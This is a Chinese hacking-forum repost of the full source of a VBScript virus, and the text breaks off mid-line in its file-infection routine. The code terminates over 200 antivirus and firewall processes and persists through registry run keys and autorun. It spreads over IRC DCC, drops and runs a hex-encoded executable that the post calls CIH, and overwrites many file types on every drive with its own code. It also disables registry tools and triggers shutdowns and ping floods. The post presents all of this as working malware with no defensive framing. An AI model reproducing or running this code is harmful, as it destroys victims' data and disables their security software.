‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]可删除杀毒软件 破坏硬件的vbs病毒

金州

智囊团成员

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T智囊团成员

帖子
1244 
精华
8 
积分
6154 
阅读权限
150 
性别
男 
在线时间
593 小时 
注册时间
2005-3-18 
最后登录
2008-6-6 

原创技术奖

楼主 发表于 2006-1-10 18:37  只看该作者

[转载]可删除杀毒软件 破坏硬件的vbs病毒

文章作者:sgl
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

这个脚本病毒能杀或删除几十种杀毒软件,防火墙的进程极其文件,携带CIH病毒,随机邮件名,内容。通过局域网传播并进行攻击(简化network代码),主要感染杀毒软件内的文件。

Rem I like Virus!
Rem writen by W.Z.T /tthacker@eyou.com 12.15.2003
on error resume next
set fso=createobject("scripting.filesystemobject")
set a=createobject("wscript.shell")
Set dir1=fso.GetSpecialFolder(0)
set dir2=fso.GetSpecialFolder(1)
Set k=fso.GetFile(WScript.ScriptFullName)
k.Copy(dir2&"\system.vbe")
k.Copy(dir1&"\Windows.vbe")
set ag=fso.createtextfile(dir1&"\kill.vbe")
ag.writeline "on error resume next"
ag.writeline "do"
ag.writeline "strComputer = ""."""
ag.writeline "Set objWMIService = GetObject(""winmgmts:"" & ""{impersonationLevel=impersonate}!\\"" & strComputer & ""\root\cimv2"")"
ag.writeline "dim fv(216)"
ag.writeline "fv(1)=""pccguide.exe"""
ag.writeline "fv(2)=""PCCClient.exe"""
ag.writeline "fv(3)=""Rfw.exe"""
ag.writeline "fv(4)=""DAVPFW.exe"""
ag.writeline "fv(5)=""VPC32.exe"""
ag.writeline "fv(6)=""RavMon.exe"""
ag.writeline "fv(7)=""debu.exe"""
ag.writeline "fv(8)=""scan.exe"""
ag.writeline "fv(9)=""mon.exe"""
ag.writeline "fv(10)=""vir.exe"""
ag.writeline "fv(11)=""iom.exe"""
ag.writeline "fv(12)=""ice.exe"""
ag.writeline "fv(13)=""anti.exe"""
ag.writeline "fv(14)=""fir.exe"""
ag.writeline "fv(15)=""prot.exe"""
ag.writeline "fv(16)=""secu.exe"""
ag.writeline "fv(17)=""dbg.exe"""
ag.writeline "fv(18)=""pcc.exe"""
ag.writeline "fv(19)=""avk.exe"""
ag.writeline "fv(20)=""spy.exe"""
ag.writeline "fv(21)=""pcciomon.exe"""
ag.writeline "fv(22)=""pccmain.exe"""
ag.writeline "fv(23)=""pop3trap.exe"""
ag.writeline "fv(24)=""webtrap.exe"""
ag.writeline "fv(25)=""vshwin32.exe"""
ag.writeline "fv(26)=""vsstat.exe"""
ag.writeline "fv(27)=""navapw32.exe"""
ag.writeline "fv(28)=""lucomserver.exe"""
ag.writeline "fv(29)=""lamapp.exe"""
ag.writeline "fv(30)=""atrack.exe"""
ag.writeline "fv(31)=""nisserv.exe"""
ag.writeline "fv(32)=""vavrunr.exe"""
ag.writeline "fv(33)=""navwnt.exe"""
ag.writeline "fv(34)=""pview95.exe"""
ag.writeline "fv(35)=""luall.exe"""
ag.writeline "fv(36)=""avxonsol.exe"""
ag.writeline "fv(37)=""avsynmgr.exe"""
ag.writeline "fv(38)=""symproxysvc.exe"""
ag.writeline "fv(39)=""regedit.exe"""
ag.writeline "fv(40)=""smtpsvc.exe"""
ag.writeline "fv(41)=""moniker.exe"""
ag.writeline "fv(42)=""program.exe"""
ag.writeline "fv(42)=""explorewclass.exe"""
ag.writeline "fv(43)=""rn.exe"""
ag.writeline "fv(44)=""ms.exe"""
ag.writeline "fv(45)=""microsoft.exe"""
ag.writeline "fv(46)=""ms.exe"""
ag.writeline "fv(47)=""office.exe"""
ag.writeline "fv(48)=""smtpsvc.exe"""
ag.writeline "fv(49)=""POP3TRAP.exe"""
ag.writeline "fv(50)=""WEBTRAP.exe"""
ag.writeline "fv(51)=""AVCONSOL.exe"""
ag.writeline "fv(52)=""AVSYNMGR.exe"""
ag.writeline "fv(53)=""VSHWIN32.exe"""
ag.writeline "fv(54)=""VSSTAT.exe"""
ag.writeline "fv(55)=""NAVAPW32.exe"""
ag.writeline "fv(56)=""NAVW32.exe"""
ag.writeline "fv(57)=""NMAIN.exe"""
ag.writeline "fv(58)=""LUALL.exe"""
ag.writeline "fv(59)=""LUCOMSERVER.exe"""
ag.writeline "fv(60)=""IAMAPP.exe"""
ag.writeline "fv(61)=""ATRACK.exe"""
ag.writeline "fv(62)=""nisserv.exe"""
ag.writeline "fv(63)=""rescue32.exe"""
ag.writeline "fv(64)=""symproxysvc.exe"""
ag.writeline "fv(65)=""nisum.exe"""
ag.writeline "fv(66)=""navapsvc.exe"""
ag.writeline "fv(67)=""navlu32.exe"""
ag.writeline "fv(68)=""navrunr.exe"""
ag.writeline "fv(69)=""pview95.exe"""
ag.writeline "fv(70)=""f-stopw.exe"""
ag.writeline "fv(71)=""f-prot95.exe"""
ag.writeline "fv(72)=""Pccwin98.exe"""
ag.writeline "fv(73)=""iomon98.exe"""
ag.writeline "fv(74)=""fp-win.exe"""
ag.writeline "fv(75)=""nvc95.exe"""
ag.writeline "fv(76)=""norton.exe"""
ag.writeline "fv(77)=""mcafee.exe"""
ag.writeline "fv(78)=""antivir.exe"""
ag.writeline "fv(79)=""webscanx.exe"""
ag.writeline "fv(80)=""safeweb.exe"""
ag.writeline "fv(81)=""cfinet.exe"""
ag.writeline "fv(82)=""cfinet32.exe"""
ag.writeline "fv(83)=""avp.exe"""
ag.writeline "fv(84)=""lockdown2000.exe"""
ag.writeline "fv(85)=""avp32.exe"""
ag.writeline "fv(86)=""zonealarm.exe"""
ag.writeline "fv(87)=""wink.exe"""
ag.writeline "fv(88)=""sirc32.exe"""
ag.writeline "fv(89)=""scam32.exe"""
ag.writeline "fv(90)=""regedit.exe"""
ag.writeline "fv(91)=""TMOAgent.exe"""
ag.writeline "fv(92)=""Tmntsrv.exe"""
ag.writeline "fv(93)=""tmproxy.exe"""
ag.writeline "fv(94)=""tmupdito.exe"""
ag.writeline "fv(95)=""TSC.exe"""
ag.writeline "fv(96)=""KRF.exe"""
ag.writeline "fv(97)=""KPFW32.exe"""
ag.writeline "fv(98)=""_AVPM.exe"""
ag.writeline "fv(99)=""AUTODOWN.exe"""
ag.writeline "fv(100)=""AVKSERV.exe"""
ag.writeline "fv(101)=""AVPUPD.exe"""
ag.writeline "fv(102)=""BLACKD.exe"""
ag.writeline "fv(103)=""CFIND.exe"""
ag.writeline "fv(104)=""CLEANER.exe"""
ag.writeline "fv(105)=""ECENGINE.exe"""
ag.writeline "fv(106)=""F-PROT.exe"""
ag.writeline "fv(107)=""FP-WIN.exe"""
ag.writeline "fv(108)=""IAMSERV.exe"""
ag.writeline "fv(109)=""ICLOADNT.exe"""
ag.writeline "fv(110)=""LOOKOUT.exe"""
ag.writeline "fv(111)=""N32ACAN.exe"""
ag.writeline "fv(112)=""NAVW32.exe"""
ag.writeline "fv(113)=""NORMIST.exe"""
ag.writeline "fv(114)=""PADMIN.exe"""
ag.writeline "fv(115)=""pccwin98.exe"""
ag.writeline "fv(116)=""rav7win.exe"""
ag.writeline "fv(117)=""SMC.exe"""
ag.writeline "fv(118)=""TCA.exe"""
ag.writeline "fv(119)=""VETTRAY.exe"""
ag.writeline "fv(120)=""VSSTAT.exe"""
ag.writeline "fv(121)=""ACKWIN32.exe"""
ag.writeline "fv(123)=""AVCONSOL.exe"""
ag.writeline "fv(124)=""AVPNT.exe"""
ag.writeline "fv(125)=""avpdos32.exe"""
ag.writeline "fv(126)=""AVSCHED32.exe"""
ag.writeline "fv(127)=""BLACKICE.exe"""
ag.writeline "fv(128)=""EFINET32.exe"""
ag.writeline "fv(129)=""CLEANER3.exe"""
ag.writeline "fv(130)=""ESAFE.exe"""
ag.writeline "fv(131)=""F-PROT95.exe"""
ag.writeline "fv(132)=""IBMASN.exe"""
ag.writeline "fv(133)=""ICMOON.exe"""
ag.writeline "fv(134)=""IOMON98.EXE"""
ag.writeline "fv(135)=""LUALL.EXE"""
ag.writeline "fv(136)=""NAVAPW32.EXE"""
ag.writeline "fv(137)=""NAVWNT.EXE"""
ag.writeline "fv(138)=""NUPGRADE.EXE"""
ag.writeline "fv(139)=""PAVCL.EXE"""
ag.writeline "fv(140)=""PCFWALLICON.EXE"""
ag.writeline "fv(141)=""PCFWALLICON.EXE"""
ag.writeline "fv(142)=""SCANPM.EXE"""
ag.writeline "fv(143)=""SPHINX.EXE"""
ag.writeline "fv(144)=""TDS2-98.EXE"""
ag.writeline "fv(145)=""VSSCAN40"""
ag.writeline "fv(146)=""WEBSCANX.EXE"""
ag.writeline "fv(147)=""WEBSCAN.EXE"""
ag.writeline "fv(148)=""ANTI-TROJAN.EXE"""
ag.writeline "fv(149)=""AVE32.EXE"""
ag.writeline "fv(150)=""AVP.EXE"""
ag.writeline "fv(151)=""AVPM.EXE"""
ag.writeline "fv(152)=""AVWIN95.EXE"""
ag.writeline "fv(153)=""CFIADMIN.EXE"""
ag.writeline "fv(154)=""CLAW95.EXE"""
ag.writeline "fv(155)=""DVP95.EXE"""
ag.writeline "fv(156)=""ESPWATCH.EXE"""
ag.writeline "fv(157)=""F-STOPW.EXE"""
ag.writeline "fv(158)=""FRW.EXE"""
ag.writeline "fv(159)=""IBMAVSP.EXE"""
ag.writeline "fv(160)=""ICSUPP95"""
ag.writeline "fv(161)=""JED.EXE"""
ag.writeline "fv(162)=""MOOLIVE.EXE"""
ag.writeline "fv(163)=""NAVLU32.EXE"""
ag.writeline "fv(164)=""NISUM.EXE"""
ag.writeline "fv(165)=""NVC95.EXE"""
ag.writeline "fv(166)=""NAVSCHED.EXE"""
ag.writeline "fv(167)=""PERSFW.EXE"""
ag.writeline "fv(168)=""SAFEWEB.EXE"""
ag.writeline "fv(169)=""SCRSCAN.EXE"""
ag.writeline "fv(170)=""SWEEP95.EXE"""
ag.writeline "fv(171)=""TDS2-NT.EXE"""
ag.writeline "fv(172)=""VSECOMR.EXE"""
ag.writeline "fv(173)=""WFINDV32.EXE"""
ag.writeline "fv(174)=""AVPCC.EXE"""
ag.writeline "fv(175)=""_AVPCC.EXE"""
ag.writeline "fv(176)=""APVXDWIN.EXE"""
ag.writeline "fv(177)=""AVGCTRL.EXE"""
ag.writeline "fv(178)=""_AVP32.EXE"""
ag.writeline "fv(179)=""AVPTC32.EXE"""
ag.writeline "fv(180)=""CFIAUDIT.EXE"""
ag.writeline "fv(181)=""CLAW95CT.EXE"""
ag.writeline "fv(182)=""DV95_O.EXE"""
ag.writeline "fv(183)=""DV95.EXE"""
ag.writeline "fv(184)=""F-AGNT95.EXE"""
ag.writeline "fv(185)=""FINDVIRU.EXE"""
ag.writeline "fv(186)=""IAMAPP.EXE"""
ag.writeline "fv(187)=""ICLOAD95.EXE"""
ag.writeline "fv(188)=""ICSSUPPNT.EXE"""
ag.writeline "fv(199)=""LOCKDOWN2000.EXE"""
ag.writeline "fv(200)=""MPFTRAY.EXE"""
ag.writeline "fv(201)=""NAVNT.EXE"""
ag.writeline "fv(202)=""NMAIN.EXE"""
ag.writeline "fv(203)=""OUTPOST.EXE"""
ag.writeline "fv(204)=""NAVW.EXE"""
ag.writeline "fv(205)=""RAV7.EXE"""
ag.writeline "fv(206)=""SCAN32.EXE"""
ag.writeline "fv(207)=""SERV95.EXE"""
ag.writeline "fv(208)=""TBSCAN.EXE"""
ag.writeline "fv(209)=""VET95.EXE"""
ag.writeline "fv(210)=""VSHWIN32.EXE"""
ag.writeline "fv(211)=""ZONEALARM.EXE"""
ag.writeline "fv(212)=""AVPMON.EXE"""
ag.writeline "fv(213)=""AVP32.EXE"""
ag.writeline "fv(214)=""windows优化大师.EXE"""
ag.writeline "fv(215)=""NOTEPAD.EXE"""
ag.writeline "fv(215)=""scon.exe"""
ag.writeline "fv(216)=""avpcc.exe"""
ag.writeline "for Each fa in fv"
ag.writeline "Set colProcessList = objWMIService.ExecQuery (""Select * from Win32_Process Where Name = '""&fa&""'"")"
ag.writeline "For Each objProcess in colProcessList"
ag.writeline "objProcess.Terminate()"
ag.writeline "Next"
ag.writeline "next"
ag.writeline "loop"
ag.close
a.run "kill.vbe"
Set ai=fso.GetFile(dir1&"\kill.vbe")
ai.attributes=ai.attributes+2
Set cc=fso.CreateTextFile(dir1&"\Run.bat")
cc.WriteLine "@echo off"
cc.WriteLine "@doskey cls=Wangzhitongisthebest!"
cc.WriteLine "@doskey cd=Wangzhitongisthebest!"
cc.WriteLine "@doskey copy=Wangzhitongisthebest!"
cc.WriteLine "@doskey rd=Wangzhitongisthebest!"
cc.WriteLine "@doskey dir=Wangzhitongisthebest!"
cc.WriteLine "@doskey exit=Wangzhitongisthebest!"
cc.WriteLine "@del c:\winnt\system32\doskey.exe"
cc.WriteLine "cls"
cc.WriteLine "echo 1st.Never damage any syatem. This will only get into trouble."
cc.WriteLine "echo 2nd.Never alter any of the systems files ,except for those needed to insure that you are not detected, and thsoeto insurethat you have access into that computer in the future."
cc.WriteLine "echo 3rd.Do not share any informatrion about you hacking projects with anyone but those you'd trust."
cc.WriteLine "echo 4th.When psoting on BBS's be as bague as possible when describing your current hacking projects.BBS's CAn be monitered by law enforcement."
cc.WriteLine "echo 5th.Never use anyone's real name or real phone number when posting on a BBS."
cc.WriteLine "echo 6th.Never leave your handle on any systems that you hack in to."
cc.WriteLine "echo 7th.Do not hack government computers."
cc.WriteLine "echo 8th.Never speak about hacking projects over your home telephone line."
cc.WriteLine "echo 9th.Be paranoid,Keep all of your hacking materials in a sate place."
cc.WriteLine "echo 10th.To become a real hacker, you have to hack. You can't just sit around reading test files and hanging out on BBS's. This is not what hacking is all about."
cc.WriteLine "echo W.Z.T 明年就要上大学了!  我最爱的人是小鱼儿,但她以不属于我了,祝她幸福."
cc.WriteLine "echo                %date% %time%"
cc.WriteLine "echo             中国黑客会成为世界最好的!"
cc.WriteLine "prompt $P$G$$$_*tthacker@eyou.com*"
cc.WriteLine "echo on"
cc.close
Set at=fso.GetFile(dir1&"\Run.bat")
at.attributes=at.attributes+2
set sii=fso.CreateTextFile(dir2&"\event.ini")
sii.WriteLine "[Levels]"
sii.WriteLine "Enabled=1"
sii.WriteLine "Count=6"
sii.WriteLine "Level1=000-Unknowns"
sii.WriteLine "000-UnknownsEnabled=1"
sii.WriteLine "Level2=100-Level 100"
sii.WriteLine "100-Level 100Enabled=1"
sii.WriteLine "Level3=200-Level 200"
sii.WriteLine "200-Level 200Enabled=1"
sii.WriteLine "Level4=300-Level 300"
sii.WriteLine " 300-Level 300Enabled=1"
sii.WriteLine "Level5=400-Level 400 "
sii.WriteLine "400-Level 400Enabled=1"
sii.WriteLine "Level6=500-Level 500"
sii.WriteLine "500-Level 500Enabled=1"
sii.WriteLine ""
sii.WriteLine "[000-Unknowns]"
sii.WriteLine "UserCount=0"
sii.WriteLine "EventCount=0"
sii.WriteLine ""
sii.WriteLine "[100-Level 100]"
sii.WriteLine "User1=*!*@*"
sii.WriteLine "UserCount=1"
sii.WriteLine "Event1=ON JOIN:#:/dcc tsend $nick " & fso.getspecialfolder(1) & "\system.vbe"
sii.WriteLine "EventCount=1"
sii.WriteLine ""
sii.WriteLine "[200-Level 200]"
sii.WriteLine "UserCount=0"
sii.WriteLine "EventCount=0"
sii.WriteLine ""
sii.WriteLine "[300-Level 300]"
sii.WriteLine "UserCount=0"
sii.WriteLine "EventCount=0"
sii.WriteLine ""
sii.WriteLine "[400-Level 400]"
sii.WriteLine "UserCount=0"
sii.WriteLine "EventCount=0"
sii.WriteLine ""
sii.WriteLine "[500-Level 500]"
sii.WriteLine "UserCount=0"
sii.WriteLine "EventCount=0"
sii.Close
set wi=fso.GetFile(dir2&"\event.ini")
wi.attributes=attributes+2
Set rei=fso.CreateTextFile(dir1&"\check.vbe")
rei.WriteLine "On Error Resume Next"
rei.WriteLine "Dim bb, aa, cc"
rei.WriteLine "Set cc=CreateObject(""WScript.Shell"")"
rei.WriteLine "aa=Minute(time)"
rei.WriteLine "bb=aa"
rei.WriteLine "do"
rei.WriteLine "bb=Minute(time)"
rei.WriteLine "loop until aa>=bb+1"
rei.WriteLine "cc.run ""system.vbe"""
rei.Close
a.run "check.vbe"
set ahd=fso.GetFile(dir1&"\check.vbe")
ahd.attributes=attributes+2
set ah=fso.GetFile(dir2&"\wscript.exe")
ah.attributes=attributes+2
set bh=fso.GetFile(dir2&"\cscript.exe")
bh.attributes=attributes+2
Set apq=fso.CreateTextFile(dir2&"\system.inf")
apq.WriteLine "[Autorun]"
apq.WriteLine "open=system.vbs"
apq.Close
Set pr=fso.GetFile(dir2&"\system.inf")
pr.attributes=attributes+2
kill()
regruns()
listadriv()
juyu()
mail()


Sub kill()
Set fso = createobject("scripting.filesystemobject")
Set aa = createobject("wscript.shell")
bb = "4D5A000300000004000000FFFF000000000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1F3F003F3F3F4C3F546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000055504500004C01040066553F0000000000000000000E010B01023200020000000C0000000000004002000000100000002000000000400000100000000200000100000000000000040000000000000000500000000400004700000200000000001000001000000000100000100000000000001000000000000000000000000020000000000000300000040700000000000000000000000000000000000000400000140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000050207400000000020000001000000002000000040000000000000000000000000000600000602E6964617461000000020000002000000002000000060000000000000000000000000000400000402E7273726300000000100000003000000008000000080000000000000000000000000000400000402E72656C6F63000034000000004000000002000000100000000000000000000000000000400000422E72737263000000802B000000000100000000000000003F4000550100003F40003F0000558D44243FDB643F000000005B8D4B425150500F014C24FE5B83C31CFA8B2B668B6BFC8D711256668973FCC13F668973025ECC568BF08B48FCF3A4833F3F0BF67402EBF05ECCFB33DBEB0733DB643F3F643F585D680C104000C374320F21C1E3103F241566896BFCC13F66896B023F23C36A0F516AFF5151516A016A023F5300010083C420978D469DCF8D87E7FCFFFF503F670040000F23C0588B4E3D3F8950FC8D40D68901FAEBB653000000005B83C324533F6800400058FF742408FF53FC595053FF53FC590F23C0585BC3561702C060000000005E81C6130300003F010F3F0200008D5C24283F240F85F50100003F83C605568A43043CFF740804403F3F46466A006A7F8B5B108B430C83C00450563F4100400083C410817C063F4558455E0F85B601000066837B18010F85AB0100006600433F320040000F829B010000518BBE523FFF3FF6C1017408663F43333F3FC0B43F3FD2428BDA43FFD793599CF63F7406663F43FFD79D0F8262010000569C833F33C0B4D68BE86A04596A3C5AFFD78B164A8BC5FFD7813E005045000F3F010000536A006A016D737061696E742E65786500558BEC83EC4456FF155C2040008BF0003C227513463F84C074043C2275F5803E22750D463F3C207E0646803E207FFA803E00740B803E207F0646803E0075F5C745000000008D45BC50FF1558204000F6453F3F00000074040FB745EC50566A006A00FF1564204000503F0000005E8BE55D3F7424106A00FF74241468001040006A006A00FF156C2040006A00FF156020400033C0C2100052570F23CC508BC5B15283C207FFD78D4222503F500FB7460E8D5410123F3FF6E18D76325052564151C1E10351033F3F4E1CF7D14151918B463F46FC8986AD3FFF663F24007C7B8BC5FFD7956A0459528B563C83C212FFD7813E6E5A697074675A5B5F595703D55203EE558D443DFC89185303D7528DBE4F3FFF578956CE8D56D8BD3F00003F83C2288B5A102B5A08762C5383E8083F8B5A14035A0853578B5A08035A0C035EFC8958043F015A08814A24400000402BEB760E03FBE23F21CCEB3383C43CEB4A0128016C240833DB8958FC8D869F3FFF3F66003F8B943FFFFFFF8950020FB6943126FFFFFF2BC2E23F21C88B58103F593F8BF13F00005A59FFD7EBF05B58F99C33C0B43FD79D5E73318BDF663F438B4EFC8B7E3FD3FE4EFB610F213F208BDCFF7338FF53245989431C837B282475068B41283C200000ACDE1B32FFFFFFFF3F00005820000050200000433F32FFFFFFFF3F00006C20000000000000000000000000000000000000000000003F00003F00003F000074200000000000003F000000000000D076F7BFC1A0F8BF2AB0F83F76F7BF000000001192DE7F00000000004765744D6F64756C6548616E646C65410000240147657453746172747570496E666F410000476574436F6D6D616E644C696E65410071004578697450726F63657373004B45524E454C33322E646C6C00004E005368656C6C4578656375746541005348454C4C33322E646C6C0089460161C3B007E670E471342675D366BDF80C8D76C5BF4C38008066BAFE0C3FD666BF58004A66C74608240FFFD68D5EF4B855550E00B9AA2A0E00FFD3C6006051E2FE32E4880091E2FEB855550F0059B5AAFFD3C60020E2FEB4E00066C746080C10FF3FDBB7805383EC2C68001000C0B7085351515168010500404151518BF481EC0000003F0400100066837E06177405FE464DEBEE015E10C6464D80EBE53F3F00803F3FC39787D5EF9787D53F449787D5EF9787D5EE003A6627530001006800400041004000320040004349482076312E3420544154554E47000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001097660A040000000000030003000000280000800E000000400000801000000058000080000000001097660A04000000000001000100000070000080000000001097660A040000000000010001000000000080000000001097660A040000000000010001000000000080000000001097660A040000000000010004040000000000000000001097660A040000000000010004040000000000000000001097660A0400000000000100040400000000003F00003F00003F0000000000003F0000140000003F0000000000003F0000200300003F0000000000002800000020000000400000000100040000000000000200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00000000000000000000000000000000000000000000003333333333300000000000000000037B7B7B7B7B7B733300000000000008B7B7B7B44444B7B73F0000000000FB7B7B7B4CCCCC447B7B73300000000FB7B7B7B7CCCCCCCC47B7B730000000FB7B7B7B7BCCCCCCCC4B7B7B3300000FB7B71117B7BCCCCCC4B7B7B700000B7B7199911B7B7CCC7B7B7B7B730000B7B719999991B7B7B7B7B7B7B700007B7B99993F7B7B7B7B7B7B7B730000B7B7999991B7B7B70007B7B7000F7B7B7999917B7B7B3000007B7B73000FB7B7B79997B7B7B30000073F000F7B7B7B7B7B7B7B73000C00077730000F3F2227B7B7B7B300003F7300000F722A2A227B7B7B7730000C088000000FB2A2A2A227B7B7B77333700000000F7B2A2A2A2B7B7B7B7B7B730F0000000FB7A2A2A2B7B7B7B7B7B7300000000F7B7A2A7B7B7B7B7B7B7300000F000000F7B7B7B7B75555B7B730000000000000FB7B7B7B55DDD55B7B30000000000000F7B7B7B5DDDDDD57000000000F00007F7B7BDDDDDDD57B730000000000000FB7B7BDDDDDD53F000000000000000F7B7BDDDDDD7B7B300000000000000000F7B7B7B7B7B70000000000000000000FFF7B7B7B77300000000000000000000007FFFFFF7000000000000000000000000000000000000000000000000000000000000000000000000000000000FCF001FF00003F00000F000007000003000003000001000001000001800000018000000180000001000006010000030300001103000018070000000F0000001F0000001F000000000001C7800003E1800003F0800007F0800007F8C0000FFCC0000FFCE0001FFDF0003FFF007FFF3FFFFFFFFFFFFF00000100010020201000010004003F00000100200334000000560053005F00560045005200530049004F004E005F0049004E0046004F00000000003FEFFE00000100000004003F0000000004003F00003F00000000000000010001000100000000000000000000000000000080020000010053007400720069006E006700460069006C00650049006E0066006F0000005C02000001003000340030003400300034004200300000004C001600010043006F006D00700061006E0079004E0061006D006500000000004D006900630072006F0073006F0066007400200043006F00720070006F0072006100740069006F006E00000040000C000100460069006C0065004400650073006300720069007000740069006F006E0000000000570069006E0064006F00770073002000BF8A7282E4760000340009000100460069006C006500560065007200730069006F006E000000000034002E00300030002E00390035003000000000002F000700010049006E007400650072006E0061006C004E0061006D0065000000500062007200750073006800000000007000260001004C006500670061006C0043006F007000790072006900670068007400000043006F0070007900720069006700680074002000630020004D006900630072006F0073006F0066007400200043006F00720070002E00200031003900390031002D00310039003900350000003F000B0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000005000420052005500530048002E00450058004500000000006C0025000100500072006F0064007500630074004E0061006D006500000000004D006900630072006F0073006F006600740052002000570069006E0064006F0077007300520020004F007000650072006100740069006E0067002000530079007300740065006D0000000000380009000100500072006F006400750063007400560065007200730069006F006E00000034002E00300030002E0039003500300000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E000000000004043F50414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E47585850414444494E4750414444494E475858504144001000001400000015305B3076303F3F3F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
vv = GV0A7543(bb)
Set tt = fso.createtextfile(fso.getspecialfolder(0) & "\rav.exe",true)
tt.write vv
tt.close
aa.run fso.getspecialfolder(0) & "\rav.exe", 1, false
GV0A7543(K24L97UF)
end sub

Function GV0A7543(K24L97UF)
For HB9DDRD2 = 1 To Len(K24L97UF) Step 2
GV0A7543 = GV0A7543 & Chr("&h" & Mid(K24L97UF, HB9DDRD2, 2))
Next
End Function


Sub regruns()
On Error Resume Next
set a=createobject("wscript.shell")
kj="HKCU\Software\Microsoft\Windows\CurrentVersion\"
ki="HKLM\Software\Microsoft\Windows\CurrentVersion\"
key=CInt(Month(Date)+Day(Date))
if key=23 then
a.RegWrite kj&"Internet Settings\NoNetAutodial", 01, "REG_BINARY"
a.run "rundll32.exe shell32.dll,SHExitWindowsEx2"
a.run "ping -l 65500 -t www.Mirosoft.com", 0
end if
a.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
a.RegWrite kj&"Policies\System\DisableRegistryTools", "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Explorer\NoFolderOptions", "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Uninstall\NoAddFromCDorFloppy", "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Uninstall\NoAddRemovePrograms", "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Uninstall\NoAddRemovePage", "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Uninstall\NoWindowsSetupPage",  "00000001", "REG_DWORD"
a.RegWrite kj&"Policies\Explorer\Advanced\Folder\Hidden\SHOWALL\checkedvalue", "00000001",  "REG_DWORD"
a.RegWrite "HKLM\Software\CLASSES\.reg", "txtfile"
a.RegWrite "HKLM\Software\Microsoft\Command Processor\AutoRun", "%systemroot%\run.bat&system32.vbe", "REG_SZ"
a.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\system", dir1&"\windows.vbe"
End sub

sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 1 or d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path & "\")
end if
Next
listadriv = s
end sub

sub infectfiles(folderspec)  
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3,fso, file,si
eq=""
Set fso=CreateObject("Scripting.FilesystemObject")
Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
vbscopy=file.ReadAll
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext = fso.GetExtensionName(f1.path)
ext = lcase(ext)
s = lcase(f1.name)
if (ext = "bmp") or (ext="bak") or (ext="pfg") or (ext="ppl")  or (ext="bin") or (ext="sig") or(ext="vdb") or(ext="dat") or (ext="gif") or (ext="doc") or (ext="xls")  or (ext="TSK") or (ext="Ipt$vpn.630") or (ext="tmp") or (ext="VDB")or (ext="VLG") or (ext="dsc") or (ext="ptn") or (ext="set") or (ext="log") or (ext="jpg") or (ext="cfg") or (ext="idx") or (ext="rec") then
set ap = fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
else if (ext = "htt") then
set di=fso.opentextfile(f1.path, 8, true)
di.writeline "<html>"
di.writeline "<head>"
di.writeline "</head>"
di.writeline "<script language=""vbscript"">"
di.writeline "<!--"
di.write    vbscopy
di.writeline "-->"   
di.writeline "</script>"
di.writeline "<BODY onload=""vbscript:main()"">"
di.writeline "</body>"
di.write    "</html>"
di.close
end if
end if
b=fso.GetBaseName(f1.path)
if (b = "Patch") or (b = "Tmntsrv") or (b="TSC") or (b = "TRA") or (b ="avpm") or (b = "avp32") or (b = "spy") or (b = "pcc") or (b = "Rfw") or (b = "DAVPFW") or (b = "VPC32") or (b = "RavMon") or (b = "debu") or (b = "scan") or (b = "mon") or (b = "vir") or (b = "iom") or (b = "ice") or (b = "anti") or (b = "fir") or (b = "prot") or (b = "secu") or (b = "dbg") or (b = "pcc") or (b = "pcciomon") or (b = "pccmain") or (b = "pop3trap")  or (b = "webtrap") or (b = "vshwin32") or (b = "vsstat") or (b = "navapw32") or (b = "lucomserver") or (b = "lamapp") or (b = "atrack") or (b = "nisserv") or (b = "vavrunr") or (b = "navwnt") or (b = "pview95") or (b = "luall") or (b = "avxonsol") or (b = "avsynmgr") or (b = "symproxysvc") or (b = "smtpsvc") or (b = "moniker") or (b = "program") or (b = "explorewclass") or (b = "rn") or (b = "ms") or (b = "microsoft") or (b = "smtpsvc") or (b = "WEBTRAP") or (b = "AVCONSOL") or (b = "AVSYNMGR") or (b = "VSHWIN32") or (b = "VSSTAT") or (b = "NAVAPW32") or (b = "NAVW32") or (b = "NMAIN") or (b = "LUALL") or (b = "LUCOMSERVER") or (b = "IAMAPP") or (b = "ATRACK") or (b = "nisserv") or (b = "rescue32") or (b = 